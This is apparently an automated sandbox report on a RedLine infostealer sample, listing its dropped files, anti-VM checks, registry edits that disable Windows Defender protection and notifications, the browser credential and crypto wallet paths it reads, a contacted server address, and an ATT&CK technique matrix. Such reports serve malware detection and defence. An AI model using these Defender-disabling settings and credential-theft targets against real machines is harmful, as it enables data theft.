                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe TID: 2620Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe TID: 5164Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe TID: 6120Thread sleep count: 3909 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP001.TMP\cEB8028.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\doa18JW.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeWindow / User API: threadDelayed 3909Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-2451
                          Source: C:\Users\user\Desktop\file.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2575
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D5467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_008D5467
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_008D2390
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeCode function: 1_2_00A02390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00A02390
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeCode function: 2_2_00A92390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00A92390
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: bvr38xq.exe, 00000004.00000003.396213666.000000000147B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_008D2F1D
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D6F40 SetUnhandledExceptionFilter,0_2_008D6F40
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_008D6CF0
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeCode function: 1_2_00A06F40 SetUnhandledExceptionFilter,1_2_00A06F40
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeCode function: 1_2_00A06CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00A06CF0
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeCode function: 2_2_00A96F40 SetUnhandledExceptionFilter,2_2_00A96F40
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeCode function: 2_2_00A96CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00A96CF0

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: atn32.exe.2.dr, Program.csReference to suspicious API methods: ('OpenProcessToken', 'OpenProcessToken@advapi32.dll')
                          Source: bvr38xq.exe.2.dr, MemoryImport.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
                          Source: 3.0.atn32.exe.230000.0.unpack, Program.csReference to suspicious API methods: ('OpenProcessToken', 'OpenProcessToken@advapi32.dll')
                          Source: 4.0.bvr38xq.exe.d70000.0.unpack, MemoryImport.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D18A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_008D18A3
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D7155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_008D7155
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D2BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_008D2BFB
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeCode function: 3_2_00007FF815F5077D GetUserNameA,3_2_00007FF815F5077D

                          Lowering of HIPS / PFW / Operating System Security Settings

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                          Source: bvr38xq.exe, 00000004.00000003.396213666.000000000147B000.00000004.00000020.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000003.396213666.0000000001453000.00000004.00000020.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.397413119.000000000147C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 4.0.bvr38xq.exe.d70000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.3.faC80kI.exe.4430c20.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.3.faC80kI.exe.4430c20.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000002.00000003.306466167.000000000442E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000000.331124097.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: bvr38xq.exe PID: 1240, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe, type: DROPPED
                          Source: Yara matchFile source: 0.3.file.exe.515f220.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.3.file.exe.515f220.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000003.305059839.00000000050CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\doa18JW.exe, type: DROPPED
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumE#
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000355E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxE#
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000355E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000355E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\wallets
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusE#
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: EthereumE#
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000355E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: Yara matchFile source: 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000002.398193743.000000000355E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: bvr38xq.exe PID: 1240, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 4.0.bvr38xq.exe.d70000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.3.faC80kI.exe.4430c20.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.3.faC80kI.exe.4430c20.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000002.00000003.306466167.000000000442E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000000.331124097.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: bvr38xq.exe PID: 1240, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe, type: DROPPED
                          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                          Valid Accounts221
                          Windows Management Instrumentation
                          1
                          DLL Side-Loading
                          1
                          DLL Side-Loading
                          21
                          Disable or Modify Tools
                          1
                          OS Credential Dumping
                          1
                          System Time Discovery
                          Remote Services1
                          Archive Collected Data
                          Exfiltration Over Other Network Medium2
                          Encrypted Channel
                          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                          System Shutdown/Reboot
                          Default Accounts12
                          Native API
                          1
                          Windows Service
                          2
                          Bypass User Access Control
                          11
                          Obfuscated Files or Information
                          LSASS Memory1
                          Account Discovery
                          Remote Desktop Protocol3
                          Data from Local System
                          Exfiltration Over Bluetooth1
                          Non-Standard Port
                          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                          Domain Accounts2
                          Command and Scripting Interpreter
                          Logon Script (Windows)1
                          Access Token Manipulation
                          1
                          Timestomp
                          Security Account Manager1
                          File and Directory Discovery
                          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                          Application Layer Protocol
                          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                          Local Accounts1
                          Service Execution
                          Logon Script (Mac)1
                          Windows Service
                          1
                          DLL Side-Loading
                          NTDS127
                          System Information Discovery
                          Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                          Cloud AccountsCronNetwork Logon Script1
                          Process Injection
                          2
                          Bypass User Access Control
                          LSA Secrets331
                          Security Software Discovery
                          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                          Replication Through Removable MediaLaunchdRc.commonRc.common1
                          Masquerading
                          Cached Domain Credentials11
                          Process Discovery
                          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                          External Remote ServicesScheduled TaskStartup ItemsStartup Items231
                          Virtualization/Sandbox Evasion
                          DCSync231
                          Virtualization/Sandbox Evasion
                          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                          Access Token Manipulation
                          Proc Filesystem1
                          Application Window Discovery
                          Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                          Process Injection
                          /etc/passwd and /etc/shadow1
                          System Owner/User Discovery
                          Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                          Rundll32
                          Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 signatures2 2 Behavior Graph ID: 803862 Sample: file.exe Startdate: 10/02/2023 Architecture: WINDOWS Score: 100 45 Snort IDS alert for network traffic 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus / Scanner detection for submitted sample 2->49 51 9 other signatures 2->51 8 file.exe 1 4 2->8         started        11 rundll32.exe 2->11         started        13 rundll32.exe 2->13         started        15 rundll32.exe 2->15         started        process3 file4 39 C:\Users\user\AppData\Local\...\fxV11fe.exe, PE32 8->39 dropped 41 C:\Users\user\AppData\Local\...\doa18JW.exe, PE32 8->41 dropped 17 fxV11fe.exe 1 4 8->17         started        process5 file6 31 C:\Users\user\AppData\Local\...\faC80kI.exe, PE32 17->31 dropped 33 C:\Users\user\AppData\Local\...\cEB8028.exe, PE32 17->33 dropped 53 Antivirus detection for dropped file 17->53 55 Machine Learning detection for dropped file 17->55 21 faC80kI.exe 1 4 17->21         started        signatures7 process8 file9 35 C:\Users\user\AppData\Local\...\bvr38xq.exe, PE32 21->35 dropped 37 C:\Users\user\AppData\Local\...\atn32.exe, PE32 21->37 dropped 57 Antivirus detection for dropped file 21->57 59 Machine Learning detection for dropped file 21->59 25 bvr38xq.exe 5 21->25         started        29 atn32.exe 9 1 21->29         started        signatures10 process11 dnsIp12 43 193.233.20.11, 4131, 49696 REDCOM-ASRedcomKhabarovskRussiaRU Russian Federation 25->43 61 Antivirus detection for dropped file 25->61 63 Multi AV Scanner detection for dropped file 25->63 65 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 25->65 73 3 other signatures 25->73 67 Machine Learning detection for dropped file 29->67 69 Disable Windows Defender notifications (registry) 29->69 71 Disable Windows Defender real time protection (registry) 29->71 signatures13

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          file.exe69%ReversingLabsWin32.Trojan.RedLine
                          file.exe59%VirustotalBrowse
                          file.exe100%AviraHEUR/AGEN.1252166
